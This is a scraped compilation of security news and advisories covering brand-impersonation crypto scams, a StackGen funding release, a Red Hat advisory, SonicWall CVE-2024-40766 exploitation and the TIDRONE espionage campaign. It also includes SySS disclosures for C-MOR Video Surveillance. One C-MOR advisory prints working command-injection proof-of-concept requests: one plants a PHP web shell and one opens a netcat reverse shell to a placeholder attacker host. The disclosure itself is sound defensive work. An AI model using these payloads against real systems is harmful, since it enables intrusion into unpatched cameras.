These scams often require victims to invest in cryptocurrency, such as USDT (Tether), with the promise of high returns. The fraudsters then push victims to recruit others, creating a multi-level marketing front.

In one case, a fraudulent website using the domain “amazon-9000com” mimicked Amazon’s platform to convince users to invest in these fake opportunities. This particular scheme was linked to over 200 other fraudulent domains impersonating major brands, including Lazada, Walmart, and TikTok.

Example of malicious domains impersonating top brands (Screenshot: DomainTools)

**Copycat Scams Spread Quickly**

The third major finding in the report is the proliferation of **copycat schemes**. Once a scam proves successful, it is quickly replicated by other cyber criminals. For example, a domain called “targetpk8top” appeared in late 2023, impersonating Target in much the same way as earlier scams targeted Amazon. The same templates, naming conventions, and SSL certificates were used, showing how quickly these tactics spread across the cybercriminal ecosystem.

These copycat scams often follow a familiar playbook: they use fake investment schemes, promise high cryptocurrency returns, and rely on social media platforms to find new victims. By the time consumers realize they’ve been duped, the scammers have often disappeared, leaving little chance of recovering lost funds.

**What’s Next for Retailers?**

The report urges the retail sector to remain vigilant. These scams have been ongoing since at least 2020, and the perpetrators show no signs of slowing down. Retailers must monitor their online presence closely, especially regarding domain registrations and brand impersonations.

Additionally, collaboration is key. Organizations like the **Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC)** and the **National Cyber-Forensics and Training Alliance (NCFTA)** are instrumental in sharing threat intelligence across the industry, helping retailers stay one step ahead of evolving cyber threats.

Although such scams are not new, their increased sophistication is only making it worse for unsuspecting customers and retailers. Therefore, both parties should recognize the threat posed by domain fraud and brand impersonation. Businesses should train their employees, and customers should learn how to identify scams or malicious websites.

1.  How to Increase Your Business’s Online Brand Awareness
2.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
3.  Check Point Research: Microsoft the Most Phished Brand in Q2 2023
4.  Domain Squatting, rand Hijacking: A Silent Threat to Digital Enterprises
5.  42,000 phishing domains discovered masquerading as popular brands

From Amazon to Target: Hackers Mimic Top Brands in Global Crypto Scam

PRESS RELEASE

SAN FRANCISCO, Sept. 10, 2024 /PRNewswire/ -- appCD, the generative infrastructure from code company, today announced the close of its $12.3M seed round, its new identity as StackGen, and the appointment of Arshad Sayyad as Chief Business Officer. The round was led by Thomvest Ventures, with existing investors, FireBolt Ventures, WestWave Capital, and Secure Octane participating. StackGen will utilize the funding to accelerate product development, enhance its go-to-market strategy, and fuel company growth.

"StackGen represents the next evolution of our commitment to revolutionizing infrastructure from code," said Sachin Aggarwal, Co-founder and CEO of StackGen. "The funding will enable us to meet the growing demand from enterprise customers as we continue to deliver on our vision for the future of infrastructure from code. Our new name encapsulates this vision and mission to provide seamless, full-stack infrastructure solutions that enhance the developer experience and enforce industry standards, while embracing generative AI."

As stated in the Gartner® Hype Cycle™ for Platform Engineering, 2024, "The plethora of cloud infrastructure services across multiple cloud providers makes it difficult for platform engineers and developers to manage infrastructure change at the same pace as application code. Therefore, much like software engineers are productive working with higher-level abstractions using object-oriented programming languages with reusable modules, platform engineers seek similar benefits for improving their productivity and simplifying infrastructure delivery. IfC merges infrastructure and application code into a common programming model and a common programming language. IfC improves development and infrastructure agility by enabling infrastructure to change at the same pace as applications — developers focus on business logic and application architecture while infrastructure code is auto-generated based on organizational standards."

"Ensuring governance and consistency in deployments is crucial. StackGen provides default standardization, embedding consistency, security, and policy guardrails seamlessly into cloud deployments for enhanced application reliability," said Arvind Gidwani, CTO, SAP NS2. "StackGen is providing the necessary compliance and cloud automation at scale to help drive digital transformation."

"I am thrilled to be an investor and board member at StackGen, partnering with repeat founder and CEO Sachin Agarwal and his cofounders, Asif Awan and Arshad Sayyad," said Umesh Padval, Managing Director, Thomvest Ventures. "StackGen is revolutionizing the DevOps market with its Infrastructure from Code platform driving 10x productivity gains for DevOps and SecOps. The strong team, massive market opportunity along with differentiated and easy to use technology met the criterion of our thesis driven investments."

The rebranding to StackGen reflects the company's commitment to providing comprehensive infrastructure solutions that span the entire technology stack.

StackGen has expanded its leadership and go-to-market team with the appointment of Arshad Sayyad, former President of Fidelity Investments India and Managing Director at Accenture, Danielle Cook, CNCF Ambassador and ex-Fairwinds and Ondata, and Lauren Rother, ex-HashiCorp. 

StackGen launched its Dev Edition in March, and has already seen significant interest, with developers rapidly signing up to utilize its cutting-edge solutions. This early success underscores the growing demand for innovative infrastructure from code technologies and sets the stage for continued growth and market penetration.

Gartner, Hype Cycle for Platform Engineering, 2024, Manjunath Bhat, Bill Blosen, 19 June 2024

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, HYPE CYCLE are a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

About StackGen  
Founded in 2023 by serial entrepreneurs Sachin Aggarwal and Asif Awan, StackGen (formerly appCD) automatically generates Infrastructure from Code (IfC) based on application code with golden standards applied. Unlike manual Infrastructure as Code (IaC) creation or "golden templates" that quickly become outdated, StackGen generates IaC automatically from the application code, without requiring any code changes, and applies preset standards. StackGen provides seamless, full-stack infrastructure solutions that enhance the developer experience and enforce industry standards. Built for platform engineers and DevOps teams tasked with improving the developer experience and enforcing standards, StackGen reduces software development lifecycle (SDLC) bottlenecks, minimizes liabilities, and eliminates cognitive overload. StackGen is backed by notable venture capital firms Thomvest Ventures, WestWave Capital, FireBolt, and Secure Octane. For further information, please visit www.stackgen.com.

About appCD  
Founded in 2023 by serial entrepreneurs Sachin Aggarwal and Asif Awan, appCD automatically generates Infrastructure from Code (IfC) based on application code with golden standards applied. Unlike manual Infrastructure as Code (IaC) creation or "golden templates" that quickly become outdated, appCD generates IaC automatically from the application code, without requiring any code changes, and applies preset standards. Built for platform engineers and DevOps teams tasked with improving the developer experience and enforcing standards, appCD reduces software development lifecycle (SDLC) bottlenecks, minimizes liabilities, and eliminates cognitive overload. appCD is backed by notable venture capital firms Thomvest Ventures, WestWave Capital, FireBolt, and Secure Octane. For further information, please visit www.appCD.com.

AppCD Closes $12.3M Seed Round and Rebrands to StackGen

Red Hat Security Advisory 2024-6536-03 - Red Hat AMQ Streams 2.5.2 is now available from the Red Hat Customer Portal. Issues addressed include bypass, denial of service, information leakage, and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6536.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat AMQ Streams 2.5.2 release and security update  
Advisory ID:        RHSA-2024:6536-03  
Product:            Streams for Apache Kafka  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6536  
Issue date:         2024-09-10  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

Red Hat AMQ Streams 2.5.2 is now available from the Red Hat Customer Portal.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. 

This release of Red Hat AMQ Streams 2.5.2 serves as a replacement for Red Hat AMQ Streams 2.5.1, and includes security and bug fixes, and enhancements.

Security Fix(es):  
* Scala: sbt is a build tool for Scala, Java, and others. Given a specially crafted zip or JAR file, `IO.unzip` allows writing of arbitrary file. This would have potential to overwrite `/root/.ssh/authorized_keys`. Within sbt's main code, `IO.unzip` is used in `pullRemoteCache` task and `Resolvers.remote`; however many projects use `IO.unzip(...)` directly to implement custom tasks. This vulnerability has been patched in version 1.9.7.(CVE-2023-46122)

* ZooKeeper: Information disclosure in persistent watcher handling. Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.  
(CVE-2024-23944)

* ZooKeeper: Authorization Bypass in Apache ZooKeeper [amq-st-2](CVE-2023-44981)

* Snappy: flaw was found in SnappyInputStream in snappy-java. This issue occurs when decompressing data with a too-large chunk size due to a missing upper bound check on chunk length. An unrecoverable fatal error can occur, resulting in a Denial of Service (DoS) (CVE-2023-43642)

* Kafka: snappy-java: Unchecked chunk length leads to DoS [amq-st-2](CVE-2023-34455), (CVE-2024-27309), (CVE-2024-31141)

* Strimzi Operators: vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)

* Strimzi Bridge: flaw was found in SnappyInputStream in snappy-java (CVE-2023-43642)

* Strimzi Bridge: netty-codec-http: Allocation of Resources Without Limits or Throttling (CVE-2024-29025)

* Strimzi Bridge: vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)

* Strimzi Bridge: netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (CVE-2023-44487)

 * Strimzi Bridge: Bump snappy-java to fix (CVE-2023-43642)

* Strimzi OAuth: In Connect2id Nimbus JOSE+JWT before 9.37.2, an attacker can cause a denial of service (resource consumption) via a large JWE p2c header value (aka iteration count) for the PasswordBasedDecrypter (PBKDF2) component. (CVE-2023-52428)

* Cruise Control: flaw was found in SnappyInputStream in snappy-java (CVE-2023-43642)

* Cruise Control: jose4j- denial of service via specially crafted JWE (CVE-2023-51775)

 * Cruise Control: Bump snappy-java to fix (CVE-2023-43642)

* Cruise Control: cruise-control reported a high-sev json vulnerability (CVE-2023-5072)

* Cruise Control: Nimbus JOSE+JWT before 9.37.2 (CVE-2023-52428)

* Strimzi Kafka Kubernetes Config Provider: Bump snappy-java to fix (CVE-2023-43642)

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/ENTMQST-5366  
https://issues.redhat.com/browse/ENTMQST-5882  
https://issues.redhat.com/browse/ENTMQST-5885  
https://issues.redhat.com/browse/ENTMQST-5886  
https://issues.redhat.com/browse/ENTMQST-6235

Red Hat Security Advisory 2024-6536-03

CISA has added CVE-2024-40766 to its Known Exploited Vulnerabilities catalog.

Source: Michael Vi via Shutterstock

Threat actors, including Akira ransomware affiliates, have begun exploiting a critical remote code execution (RCE) vulnerability that SonicWall disclosed — and patched — in its Gen 5, Gen 6, and some versions of its Gen 7 firewall products last month.

The attack activity has prompted the US Cybersecurity and Infrastructure Security Agency (CISA) to add the vulnerability, identified as CVE-2024-40766, to its Known Exploited Vulnerabilities (KEV) database. The vulnerability is one of the three that CISA added to its KEV catalog this week and wants federal civilian executive branch (FCEB) agencies to address by Sept. 30.

**Improper Access Control Bug**

CVE-2024-40766 is an improper access control bug in the management access component of SonicWall SonicOS running on the company’s SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older. It lets attackers gain complete control of affected devices and in some cases cause the firewall to crash entirely.

SonicWall first disclosed the bug on Aug. 22 and assigned it a severity rating of 9.3 out a possible maximum of 10 on the CVSS scale. On Sept. 6, the network security vendor updated the advisory to include the local SSLVPN accounts as being vulnerable to CVE-2024-40766 as well. The advisory also warned customers about attack activity targeting the vulnerability and urged organizations to immediately apply the company's recommended mitigations for it.

Artic Wolf on Friday said it had observed Akira ransomware affiliates abusing the vulnerability to compromise SSLVPN accounts on SonicWall devices. "In each instance, the compromised accounts were local to the devices themselves rather than being integrated with a centralized authentication solution such as Microsoft Active Directory," Arctic Wolf said.  "Additionally, MFA was disabled for all compromised accounts."

SonicWall wants customers of affected appliances to update to fixed versions of the technology as soon as possible. The company also recommends that organizations limit firewall management functions to trusted sources and to disable WAN management via the Internet. "Similarly, for SSLVPN, please ensure that access is limited to trusted sources, or disable SSLVPN access from the Internet," SonicWall advised.

The company is also "strongly" advocating that administrators of the company's Gen 5 and Gen6 firewalls ensure that SSLVPN users with locally managed accounts change their passwords immediately to protect against unauthorized access. Additionally, SonicWall has recommended that organizations enable multifactor authentication (MFA) for all SSLVPN users.

**SonicWall: A Popular Target**

SonicWall's firewall products, like routers, VPNs and other network security technologies are an attractive attack target because of the elevated privileges threat actors can gain on a target network by compromising one of these products. Many network security products give attackers access to all traffic flowing in and out of a network and also to the valuable assets and data that are behind the devices. In recent years, security vendors such as Cisco and entities like CISA and the UK's National Cyber Security Center (NCSC) have warned repeatedly about attackers targeting vulnerabilities in network devices as a means to gain an initial foothold on target devices.

Earlier this year, CISA, for instance, identified China's notorious Volt Typhoon group as routinely targeting networking appliances from vendors such as Fortinet, Ivanti, NetGear, Cisco, and Citrix to obtain initial access. In a 2023 report, Cisco said it had observed continuous malicious activity, including traffic manipulation and copying, infrastructure reconnaissance, and active attempts to weaken network defenses, by state sponsored actors and intelligence agencies around the world. The company assessed that attackers like targeting network technologies such as routers and switches because of the deep visibility they enable on a victim network and because organizations often fail to keep the devices properly secured and patched.

Concerns over heightening government exposure to such attacks prompted CISA to issue a binding operational directive in late June that required FCEB agencies to implement strong measures to protect management interfaces for specific network devices such as firewalls, routers, switches, VPN concentrators, load balancers, and proxies.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Akira Ransomware Actors Exploit SonicWall Bug for RCE

A previously undocumented threat actor with likely ties to Chinese-speaking groups has predominantly singled out drone manufacturers in Taiwan as part of a cyber attack campaign that commenced in 2024.
Trend Micro is tracking the adversary under the moniker TIDRONE, stating the activity is espionage-driven given the focus on military-related industry chains.
The exact initial access vector used

Cyber Attack / Threat Intelligence

A previously undocumented threat actor with likely ties to Chinese-speaking groups has predominantly singled out drone manufacturers in Taiwan as part of a cyber attack campaign that commenced in 2024.

Trend Micro is tracking the adversary under the moniker **TIDRONE**, stating the activity is espionage-driven given the focus on military-related industry chains.

The exact initial access vector used to breach targets is presently unknown, with Trend Micro's analysis uncovering the deployment of custom malware such as CXCLNT and CLNTEND using remote desktop tools like UltraVNC.

An interesting commonality observed across different victims is the presence of the same enterprise resource planning (ERP) software, raising the possibility of a supply chain attack.

The attack chains subsequently go through three different stages that are designed to facilitate privilege escalation by means of a User Access Control (UAC) bypass, credential dumping, and defense evasion by disabling antivirus products installed on the hosts.

Both the backdoors are initiated by sideloading a rogue DLL via the Microsoft Word application, allowing the threat actors to harvest a wide range of sensitive information,

CXCLNT comes equipped with basic upload and download file capabilities, as well as features for clearing traces, collecting victim information such as file listings and computer names, and downloading next-stage portable executable (PE) and DLL files for execution.

CLNTEND, first detected in April 2024, is a discovered remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445).

"The consistency in file compilation times and the threat actor's operation time with other Chinese espionage-related activities supports the assessment that this campaign is likely being carried out by an as-yet unidentified Chinese-speaking threat group," security researchers Pierre Lee and Vickie Su said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

TIDRONE Espionage Group Targets Taiwan Drone Makers in Cyber Campaign

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a command injection vulnerability.

Advisory ID:               SYSS-2024-030  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        OS Command Injection (CWE-78)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45179  
Authors of Advisory:       Matthias Deeg (SySS GmbH), Chris Beiter,  
                            Frederik Beimgraben,

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to insufficient input validation, the C-MOR web interface is  
vulnerable to OS command injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionality is vulnerable to OS command injection attacks, for  
example for generating new X.509 certificates or setting the time zone.

The OS command injection vulnerability in the script "generatesslreq.pml"  
can be exploited as a low-privileged authenticated user (see   
SYSS-2024-024[3])  
in order to execute commands in the context of the Linux user "www-data".

The OS command injection vulnerability in the script "settimezone.pml"  
requires an administrative user for the C-MOR web interface.

By also exploiting the privilege escalation vulnerability described in  
SYSS-2024-027[4], it is possible to execute commands on the C-MOR system  
with root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By sending the following HTTP POST request to the script  
"generatesslreq.pml", the injected OS command via the parameter  
"city" is executed as Linux user "www-data".

In this sample attack vector, a simple PHP web shell is created in  
the backup directory within the web server's webroot:

POST /generatesslreq.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 152  
Connection: close

countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss

This PoC attack can be performed using the following curl command:

curl -X POST -d "countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss" --user "<USERNAME>:<PASSWORD>"   
--ciphers "DEFAULT:!DH" https://<HOST>/generatesslreq.pml

The uploaded web shell can be used via the following URL:

https://<HOST>/backup/web shell.php?cmd=<COMMAND>

In version 6.00PL01, an OS command injection was, for instance, possible  
using the following attack vector:

curl -X POST \  
   -d   
'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26'   
\  
   --user "<USERNAME>:<PASSWORD>" \  
   --insecure \  
   --ciphers 'DEFAULT:!DH' \  
   https://<HOST>/en/setdatetime.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the   
newly  
released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-030

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt  
[3] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[4] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[5] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Command Injection

C-MOR Video Surveillance version 5.2401 makes use of unmaintained vulnerability third-party components.

Advisory ID:               SYSS-2024-029  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Dependency on Vulnerable Third-Party   
Component (CWE-1395)  
                            Use of Unmaintained Third Party Components   
(CWE-1104)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2017-9798, CVE-2017-3167, and more  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

The C-MOR system uses several outdated third-party software components  
with known security vulnerabilities.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that the C-MOR system depends  
on several outdated third-party software components with known security  
vulnerabilities, for instance an old Linux kernel, Apache HTTP Server  
2.2.16, PHP 5.3.3, or Python 2.6.

Some of the used software components have also reached their end of life  
and are not supported anymore by a maintainer.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following excerpt of the "dpkg-query" output illustrates some outdated  
third-party software components used on the C-MOR system:

$ sudo dpkg-query -l  
(...)  
ii  apache2                             2.2.16-6+squeeze10   
Apache HTTP Server metapackage  
ii  apache2-mpm-prefork                 2.2.16-6+squeeze10   
Apache HTTP Server - traditional non-threaded model  
ii  apache2-utils                       2.2.16-6+squeeze10   
utility programs for webservers  
ii  apache2.2-bin                       2.2.16-6+squeeze10   
Apache HTTP Server common binary files  
ii  apache2.2-common                    2.2.16-6+squeeze10   
Apache HTTP Server common files  
(...)  
ii  libapache2-mod-php5                 5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (Apache 2 module)  
(...)  
ii  libssl0.9.8                         0.9.8o-4squeeze14            SSL   
shared libraries  
(...)  
ii  linux-image-4.7.8                   c-mor-v5-00   
Linux kernel binary image for version 4.7.8  
(...)  
ii  php5                                5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (metapackage)  
rc  php5-cgi                            5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (CGI binary)  
ii  php5-cli                            5.3.3-7+squeeze14   
command-line interpreter for the php5 scripting language  
ii  php5-common                         5.3.3-7+squeeze14   
Common files for packages built from the php5 source  
ii  php5-gd                             5.3.3-7+squeeze14            GD   
module for php5  
ii  php5-mysql                          5.3.3-7+squeeze14   
MySQL module for php5  
ii  php5-suhosin                        0.9.32.1-1   
advanced protection module for php5  
(...)  
ii  python2.6                           2.6.6-8+b1                   An   
interactive high-level object-oriented language (version 2.6)  
ii  python2.6-minimal                   2.6.6-8+b1                   A   
minimal subset of the Python language (version 2.6)  
(...)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-029

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-029.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Insecure Third-Party Components

SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible.
The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10.
"An improper access control vulnerability has been identified in the SonicWall SonicOS management

Network Security / Threat Detection

SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible.

The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10.

"An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash," SonicWall said in an updated advisory.

With the latest development, the company has revealed that CVE-2024-40766 also impacts the firewall's SSLVPN feature. The issue has been addressed in the below versions -

*   SOHO (Gen 5 Firewalls) - 5.9.2.14-13o
*   Gen 6 Firewalls - 6.5.2.8-2n (for SM9800, NSsp 12400, and NSsp 12800) and 6.5.4.15.116n (for other Gen 6 Firewall appliances)

The network security vendor has since updated the bulletin to reflect the possibility that it may have been actively exploited.

"This vulnerability is potentially being exploited in the wild," it added. "Please apply the patch as soon as possible for affected products."

As temporary mitigations, it's recommended to restrict firewall management to trusted sources or disable firewall WAN management from Internet access. For SSLVPN, it's advised to limit access to trusted sources, or disable internet access altogether.

Additional mitigations include enabling multi-factor authentication (MFA) for all SSLVPN users using one-time passwords (OTPs) and recommending customers using GEN5 and GEN6 firewalls with SSLVPN users who have locally managed accounts to immediately update their passwords for preventing unauthorized access.

There are currently no details about how the flaw may have been weaponized in the wild, but Chinese threat actors have, in the past, unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to establish long-term persistence.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ssl